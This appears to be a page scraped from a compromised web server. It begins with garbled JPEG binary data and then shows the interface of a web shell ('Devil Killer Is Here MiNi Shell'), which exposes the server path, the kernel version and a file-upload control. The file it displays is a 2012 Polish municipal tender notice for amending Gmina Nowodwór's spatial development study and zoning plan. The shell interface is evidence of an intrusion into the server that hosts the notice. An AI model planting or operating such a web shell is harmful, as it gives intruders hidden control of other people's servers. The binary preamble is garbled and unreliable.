JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121128/477452-N-2012.html

<p class="kh_header"><b>Nowodwór: Opracowanie projektu zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz projektu zmiany Miejscowego planu zagospodarowania przestrzennego Gminy Nowodwór.</b><br>
<b>Numer ogłoszenia: 477452 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowodwór , Nowodwór 71 A, 08-503 Nowodwór, woj. lubelskie, tel. 81 866 10 18, faks 81 866 10 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowodwor.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz projektu zmiany Miejscowego planu zagospodarowania przestrzennego Gminy Nowodwór..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia: 1. Przedmiotem zamówienia jest opracowanie w niezbędnym zakresie projektu zmian Studium uwarunkowań i kierunków zagospodarowania przestrzennego uchwalonego uchwałą Rady Gminy Nowodwór Nr VI/28/99 z dnia 20 czerwca 1999 r. oraz Miejscowego planu zagospodarowania przestrzennego Gminy Nowodwór uchwalonego uchwałą Rady Gminy Nowodwór nr XI/57/2000 z dnia 24 maja 2000 r. wraz ze zmianą zatwierdzoną Uchwałą Nr X/34/07 Rady Gminy w Nowodworze z dnia 16 lipca 2007r., zgodnie z przyjętymi przez Radę Gminy Nowodwór uchwałami: a) Uchwałą Nr IV/26/2011 Rady Gminy Nowodwór z dnia 25 lutego 2011 r. w sprawie przystąpienia do sporządzenia zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Nowodwór, b) Uchwałą Nr IX/45/2011 Rady Gminy Nowodwór z dnia 30 czerwca 2011 r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Nowodwór, zwanymi Uchwałami intencyjnymi. 2. Pełny tekst Uchwał intencyjnych wraz z załącznikami graficznymi stanowi integralną część specyfikacji. 3. Zakres prac określonych Uchwałami intencyjnymi i objęty niniejszym zamówieniem to dwa odrębne zadania, dla których indywidualne toki formalno-prawne będą prowadzone równolegle: 1) Zadanie Nr I: Stosownie do Uchwały Rady Gminy Nr IV/26/2011 z dnia 25 lutego 2011 r. w sprawie przystąpienia do sporządzenia zmiany studium uwarunkowań i kierunków zagospodarowania Gminy Nowodwór: - powierzchnia objęta planowaną zmianą: zmiana studium może być dokonana w całym obszarze określonym w załączniku graficznym do Uchwały Nr IV/26/2011 z dnia 25 lutego 2011 r., - planowany zakres zmian: zmianę obowiązującego studium uwarunkowań i kierunków zagospodarowania należy wykonać w zakresie niezbędnym dla realizacji zamierzenia planistycznego określonego w Zadaniu Nr II. 2) Zadanie Nr II: Stosownie do Uchwały Rady Gminy Nr IX/45/2011 z dnia 30 czerwca 2011 r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Nowodwór: - powierzchnia objęta planowaną zmianą wynosi około 135 ha, (147 wniosków przyjętych od właścicieli działek) -planowany zakres zmian obejmuje działki :  w m. Borki - działki nr ewid.: 184, 185, 44 - zał. NR 1; w m. Grabowce Dolne - działki nr ewed.: 436, 353, 336, 337/1, 341, 342 - zał. NR 2;w m. Grabowce Górne - działki nr ewid.: 209, 215/1, 215/2 - zał. NR 3;w m. Grabów Rycki - działki nr ewid.: 515/5, 615/4, 442/1, 451/2, 451/3, 451/4, 585/2, 530/4, 376, 359 - zał. NR 4, działki nr ewid.: 149, 150, 151, 208, 209, 170, 137, 490, 491 - zał. NR 5, działka nr ewid.: 588 - zał. NR 25;w m. Grabów Szlachecki - działki nr ewid.: 22/2, 181, 178, 56/1, 466, 68, 177 - zał. NR 6,- działki nr ewid.: 610, 611/1, 611/2, 643/3, 82, 643/2, 644/1, 645, 895/2, 915/2, 41/1, 25, 881/1, 881/3, 632, 637/1, 956/1, 799/1, 624, 625, 586/1, 587/1, 22/7, 579, 580, 913, 914, 893, 894, 592/3, 648/1, 794, 795,975/1, 23, 24/1, 22/3 - zał. NR 7- działki nr ewid.: 756/1, 737/1, 738, 772/1, 773/2, 774/1, 730/8, 730/9, 755/1, 735/2, 703/1, 704/2, 704/1, 703/2, 1211, 764, 767/1, 767/2, 843/1, 843/4, 844, 845/1, 1212, 699, 687, 759/1, 759/2, 818/2, 679, 1004/1, 639, 698, 747, 902, 922, 1206, 700, 701,816 - zał. NR 8- działki nr ewid.: 510/3, 512/5, 526, 465/2, 41/2, 505, 507, 546/1, 546/4, 558/1, 551, 420, 551, 552/2, 506 - zał. NR 9; w. m. Jakubówka - działki nr ewid.: 219, 222/1, 272/1 - zał NR 10,- działki nr ewid.: 420/2, 420/3, 429/2, 430, 144/1, 361, 254/2, 441, 167/3, 438/6, 327, 321, 62/2, 62/3 - zał. NR 11;w m. Lendo Wielkie - działki nr ewid.: 177/8, 178/10, 179/4, 178/8, 177/2, 178/2, 176/2, 62, 63/1, 63/2 - zał. NR  12;w m. Nowodwór - działki nr ewid.: 281/1, 282/7, 282/5, 497/1, 143, 117/1, 172, 200/2, 37/3, 229, 450/6, 450/8, 230, 450/9, 161/3, 228, 220, 221, 222/1, 301/3, 301/6, 302/4, 302/2, 298/15, 299, 300,66, 487/1, 20, 531/1, 118/1, 93, 508, 189, 171/3, 181/6, 171/5, 171/6, 449/18, 188, 501/1, 449/20 - zał. NR 13,-działki nr ewid.: 43/1, 42  - zał. NR 14; w m. Niedźwiedź - działki nr ewid.: 371, 462, 512 - zał. NR 15; w m. Przestrzeń - działki nr ewid.: 38, 74/2, 82, 159 - zał. NR 16; w m. Rycza - działki nr ewid.: 60, 56, 5, 54 - zał. NR 17; w m. Trzcianki - działki nr ewid.: 300, 293, 271, 166, 159, 160, 161, 124, 125, 289, 290 - zał. NR 18,- działki nr ewid. 378, 379/1, 400, 401, 402, 370 - zał. NR 19;                                                                                                                                                                                                   w m. Urszulin - działki nr ewid.: 204, 205, 183, 191, 193, 250,352,491,537 - zał. NR 20;w m. Wrzosówka - działki nr ewid.: 67, 129, 127, 128 - zał. NR 21;w m. Zawitała - działki nr ewid.: 730, 935, 600/1, 601/1, 602/1, 934, 799, 612/2, 870, 871/1, 840, 841/1, 586/4, 589, 590,618- zał. NR 22,- działki nr ewid. : 1079, 1080, 987, 950 - zał. NR 23,- działka nr ewid.: 555 - zał. NR 26;w m. Zielony Kąt - działki nr ewid.: 77/2, 73/2, 79/2, 70/2, 133/2, 78/2, 74/3 - zał. NR 24
 4. Opracowania należy wykonać zgodnie z obowiązującymi przepisami, w szczególności zgodnie z wymogami wynikającymi z: - Ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717 późn. zm.), - Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587), - Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118, poz. 1233), - Ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.). 1) Zakres zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego obejmuje w szczególności; - prace przygotowawcze, rozpatrzenie wniosków , opinii, opracowanie uwarunkowań, sporządzenie projektu zmiany studium wraz z prognozą oddziaływania na środowisko,      przeprowadzenie strategicznej oceny oddziaływania na środowisko, o którym mowa w art. 46 pkt. 1 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.), - zaopiniowanie i uzgodnienie projektu zmiany studium, - wyłożenie projektu do publicznego wglądu, - zgłoszenie projektu zmiany studium do uchwalenia, - przekazanie Zamawiającemu dokumentacji. 2) Zakres zmiany Miejscowego planu zagospodarowania przestrzennego obejmuje w szczególności: ustalenie przeznaczenia terenów (w tym dla inwestycji celu publicznego) oraz określenie sposobów ich zagospodarowania i zabudowy na obszarze opracowania, zgodnie z uchwałą Rady Gminy Nowodwór i wymaganiami określonymi w rozporządzeniu Ministra Infrastruktury z dnia z 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587), przeprowadzenie strategicznej oceny oddziaływania na środowisko, o którym mowa w art. 46 pkt. 1 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z późn. zm.), sporządzenie prognozy skutków finansowych uchwalenia planu miejscowego z uwzględnieniem art. 36 wyżej cytowanej ustawy o planowaniu i zagospodarowaniu przestrzennym, zgodnie z § 11 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego, sporządzenie dokumentacji dotyczącej wniosku o zgodę na zmianę przeznaczenia gruntów rolnych na cele nierolnicze oraz gruntów leśnych na celu nieleśne, zgodnie z przepisami ustawy z dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych (Dz. U. z 2004 r. Nr 121, poz. 1266 z późn. zm.), o ile zaistnieje taka potrzeba, skompletowanie dokumentacji prac planistycznych zgodnie z § 12 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego. 5. W ramach realizacji przedmiotu zamówienia wykonawca zobowiązany jest do opracowania wszelkich dokumentów wynikających z procedur związanych ze sporządzeniem projektu zmian Studium uwarunkowań i kierunków zagospodarowania przestrzennego i projektu zmiany Miejscowego planu zagospodarowania przestrzennego, w tym w szczególności: wykonanie analizy wniosków do projektów: zmiany planu miejscowego i zmiany studium, opracowanie propozycji ich rozpatrzenia,  opracowanie projektu zmiany studium i planu miejscowego z rozpatrzeniem uwag władz gminy oraz mieszkańców, opracowanie prognozy oddziaływania na środowisko, opracowanie prognozy skutków finansowych uchwalenia planu miejscowego, przedstawienie projektów: zmiany studium i zmiany planu miejscowego wraz z całą dokumentacja, w tym prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia zmiany planu miejscowego, do zaopiniowania Gminnej Komisji Urbanistyczno-Architektonicznej, analiza potrzeby opracowania wniosków o zgodę na zmianę przeznaczenia gruntów rolnych i leśnych oraz opracowanie wniosków o zgodę na zmianę przeznaczenia gruntów rolnych na cele nierolnicze (w zależności od warunków analizy), przygotowanie projektu wystąpienia o zaopiniowanie projektów: zmiany studium i zmiany planu miejscowego zgodnie z rozdzielnikiem oraz kopiami projektów: zmiany studium i zmiany planu wraz prognozami oddziaływania na środowisko, przygotowanie projektu wystąpienia o uzgodnienie projektów: zmiany studium i zmiany planu miejscowego zgodnie z rozdzielnikiem oraz kopiami projektów: zmiany studium i zmiany planu miejscowego wraz z prognozami oddziaływania na środowisko, opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach, wprowadzenie zmian do tekstu i rysunku projektów: zmiany studium i zmiany planu miejscowego wynikających z uwzględnionych uwag zawartych w opiniach i zmian wynikających z dokonanych uzgodnień, w sposób uzgodniony z władzami Gminy, opracowanie zmiany prognoz oddziaływania na środowisko, w związku ze zmianami w projektach: zmiany studium i zmiany planu miejscowego, opracowanie zmiany prognozy skutków finansowych uchwalenia zmiany planu miejscowego, w związku ze zmianami w projekcie zmiany planu miejscowego, opracowanie projektów ogłoszenia prasowego i obwieszczenia o wyłożeniu projektu zmiany planu miejscowego wraz z prognozą oddziaływania na środowisko, do publicznego wglądu, obsługa wyłożenia projektów: zmiany studium i zmiany planu miejscowego (minimum 1 raz w tygodniu), zorganizowanie oraz udział w dyskusji publicznej nad, przyjętymi w projektach zmiany studium i zmiany planu miejscowego, rozwiązaniami i sporządzenie protokołów z tych dyskusji, sporządzenie wykazu uwag wzniesionych do wyłożonego do publicznego wglądu projektu zmiany planu miejscowego i prognozy oddziaływania na środowisko, analiza tych uwag i opracowanie propozycji ich rozpatrzenia, udział w posiedzeniach organów Gminy i komisji dotyczących rozpoznania uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu zmiany planu miejscowego i prognozy oddziaływania na środowisko, wprowadzenie zmian do projektu zmiany planu miejscowego wynikających z rozpatrzenia uwag wniesionych po wyłożeniu planu, przedstawienie Radzie Gminy projektu zmiany miejscowego planu wraz z listą nieuwzględnionych uwag wniesionych po wyłożeniu planu, przygotowywanie projektów uchwał Rady Gminy związanych z uchwaleniem zmiany studium i zmiany planu miejscowego, ponowne przeprowadzenie czynności określonych w art. 17 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, dla części projektu zmiany planu miejscowego, jeżeli Rada Gminy stwierdzi konieczność dokonania zmiany, w zakresie niezbędnych do dokonania tych zmian (przygotowanie projektu wystąpienia o ponownie zaopiniowanie i o ponowne uzgodnienie wraz z rozdzielnikiem oraz kopiami projektu zmiany planu miejscowego i prognozy oddziaływania na środowisko, opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach, przygotowanie listy nieuwzględnionych uwag), wprowadzenie zmian do tekstu i rysunku projektu zmiany planu miejscowego, odpowiednio do uwzględnionych uwag zawartych w uzasadnionych prawnie stanowiskach podmiotów uzgadniających, w sposób ustalony z władzami Gminy itp., naniesienie zmian w tekście planu miejscowego i na rysunek planu miejscowego w skali 1:10 000 , przygotowanie projektu uchwały o zgodności projektu zmiany planu miejscowego z ustaleniami studium, przygotowanie projektu rozstrzygnięcia o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych Gminy oraz zasad ich finansowania, skompletowanie, uporządkowanie i oprawienie dokumentacji prac planistycznych, przygotowanie projektu wystąpienia do Wojewody w sprawie oceny zgodności z przepisami prawnymi uchwały Rady Gminy wraz z załącznikami, przygotowanie potrzebnej ilości materiałów roboczych - odpowiedniej m.in. do uzgodnień, opinii, konsultacji, przygotowanie cyfrowego zapisu części tekstowej oraz kopii rysunku planu według wymogów urzędu wydającego dziennik urzędowy województwa, 6. Wszelkie prace projektowe lub czynności nie opisane wyżej, a wynikające z procedur określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz przepisach odrębnych, niezbędne do właściwego i kompletnego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia. 7. Przedmiot zamówienia należy wykonać w formie papierowej wraz z elektronicznym zapisem na płycie CD tekstu (standard plików doc. i .pdf) i rysunku studium i planu w plikach cyfrowych (standard plików .tif, .jpg oraz pdf). 7.1 Studium uwarunkowań i kierunków zagospodarowania przestrzennego: a) ujednolicony tekst studium - 2 egzemplarze opracowania w formie papierowej + 2x płyta CD, b) ujednolicony rysunek studium w skali 1:10000 - 1 egzemplarz opracowania w formie papierowej + 2x płyta CD, 7.2 Miejscowy plan zagospodarowania przestrzennego będący przedmiotem zamówienia : a) tekst planu - 3 egz. opracowania w formie papierowej + 2xpłyta CD, b) rysunek planu w skali 1:1000 w formie papierowej - 3 egz., w tym jeden egzemplarz ofoliowany + 2x płyta CD, 7.3 Wykonawca zobowiązany jest do naniesienia uchwalonych zmian z zakresu Zadania Nr II we wszystkich egzemplarzach obowiązującego planu Gminy istniejących w formie papierowej i elektronicznej (cz. graficzna i tekstowa), do dnia końcowego odbioru prac przez Zamawiającego. 7.4 Dokumentacja prac planistycznych sporządzona w wersji papierowej, powinna być wykonana i dostarczona zamawiającemu w 2 kompletach w formie papierowej z zapisem elektronicznym dokumentów - 2x płyta CD. 7.5 Ponadto w ramach niniejszej umowy Wykonawca zobowiązany jest do: 1- przygotowania przyjętego studium i planu miejscowego (rysunek + tekst) wraz z uzasadnieniem, o którym mowa w art. 42 pkt 2 i podsumowaniem, o którym mowa w art. 55 ust. 3 ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, wraz ze wzorami ogłoszenia i obwieszczenia w celu podania do publicznej wiadomości informacji o przyjęciu w/w dokumentów - 1egz. w formie papierowej oraz elektronicznej 1xCD, 2- przygotowania przyjętego studium i planu miejscowego(rysunek + tekst) wraz z podsumowaniem, o którym mowa w art. 55 ust. 3 ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko ze wzorem zawiadomienia wraz z rozdzielnikiem w celu ich przekazania właściwym organom, o których mowa w art. 57 i 58 ustawy o udostępnianiu informacji o środowisku, w formie wymaganej przez te organy. 8. Dla wykonania przedmiotu zamówienia Zamawiający przekaże Wykonawcy: a) obowiązujące Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Nowodwór- część graficzna i opisowa wraz ze zmianami; b) obowiązujący miejscowy plan zagospodarowania przestrzennego gminy Nowodwór ( tekst + rysunek w skali 1:10000); c) opracowanie ekofizjograficzne sporządzone dla Gminy Nowodwór 2007 r.; d) kopie dotychczas zebranych wniosków w sprawie zmian w miejscowym planie zagospodarowania przestrzennego w obszarze będącym przedmiotem podjętych przez Radę Gminy uchwał intencyjnych: e)kopię urzędowych map zasadniczych w skali 1:1000 gromadzonych w państwowym zasobie geodezyjnym i kartograficznym terenu objętego planowanymi zmianami; f) kopie map ewidencyjnych oraz wypisów z rejestru gruntów dla działek znajdujących się w obszarze planowanych zmian; g) mapę topograficzną obszaru gminy Nowodwór w skali 1: 10 000; h) kopie uchwał Rady Gminy o przystąpieniu do zmian Studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz zmian Miejscowego planu zagospodarowania przestrzennego gminy Nowodwór..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 71.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku będzie posiadanie doświadczenia zawodowego w zakresie prac planistycznych polegające na wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej dwóch projektów miejscowych planów zagospodarowania przestrzennego o charakterze zabudowy mieszkaniowej lub usługowej, i w obszarze co najmniej 80 ha, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, to co najmniej dwóch projektów miejscowych planów zagospodarowania przestrzennego o charakterze zabudowy mieszkaniowej lub usługowej w obszarze co najmniej 80 ha,  z podaniem ich wartości , przedmiotu , dat wykonania i odbiorów oraz załączeniem dokumentu potwierdzajacego , że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku będzie złożenie wykazu osób które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi , wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnego do wykonania zamówienia , a także zakresu wykonywanych przez nie czynności , oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku będzie złożenie wykazu osób które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi , wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnego do wykonania zamówienia , a także zakresu wykonywanych przez nie czynności , oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

